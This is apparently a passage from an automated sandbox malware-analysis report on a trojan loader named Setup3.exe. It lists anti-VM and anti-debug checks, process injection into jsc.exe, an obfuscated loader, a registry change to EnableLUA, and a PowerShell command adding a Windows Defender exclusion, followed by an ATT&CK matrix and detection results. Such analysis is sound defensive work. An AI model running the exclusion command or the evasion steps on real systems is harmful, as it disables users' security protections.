                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -597485s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -597360s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -597235s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -597110s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -596985s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -596860s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -596735s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -596610s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -596485s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -596360s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -596235s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -596110s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -595985s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -595860s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -595735s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -595610s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -595485s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -595360s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -595235s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -595110s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -594969s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7252Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -594860s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -594735s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -594610s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -594485s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -594360s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -594235s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -594110s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -593985s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599325Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 300000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 593985Jump to behavior
                Source: Amcache.hve.12.drBinary or memory string: VMware
                Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: jsc.exe, 00000008.00000002.4476539913.0000000000B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                Source: Amcache.hve.12.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                Source: Setup3.exe, 00000000.00000002.2237179259.000001AAED4DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91
                Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Setup3.exe, ------.csReference to suspicious API methods: .LoadLibrary(._322D_31E2_31C5_D7FF(_A97F._31ED_3215_D7C9_D7C9_31CD))
                Source: Setup3.exe, .csReference to suspicious API methods: GetProcAddress(_3192_D7C8_31D3_321E, _3208_31C4_322E_A9B3_31DC_3204)
                Source: Setup3.exe, .csReference to suspicious API methods: VirtualProtect(procAddress, (uint)_A982_3226_31E7_322F_31E8_31E4_3196_320D.Length, 64u, out var _A982_31DE_3229_3198_31E2_3219_3196_3228)
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -ForceJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 404000Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 406000Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 726008Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -ForceJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeQueries volume information: C:\Users\user\Desktop\Setup3.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Users\user\Desktop\Setup3.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                311
                Process Injection
                21
                Disable or Modify Tools
                OS Credential Dumping121
                Security Software Discovery
                Remote Services1
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Process Discovery
                Remote Desktop ProtocolData from Removable Media11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)311
                Process Injection
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Obfuscated Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                System Network Configuration Discovery
                SSHKeylogging4
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Setup3.exe53%ReversingLabsByteCode-MSIL.Trojan.Operaloader
                Setup3.exe65%VirustotalBrowse
                Setup3.exe100%AviraHEUR/AGEN.1362876
                Setup3.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                yip.su7%VirustotalBrowse
                pastebin.com0%VirustotalBrowse
                iplogger.com1%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://sectigo.com/CPS00%URL Reputationsafe
                http://ocsp.sectigo.com00%URL Reputationsafe
                http://upx.sf.net0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
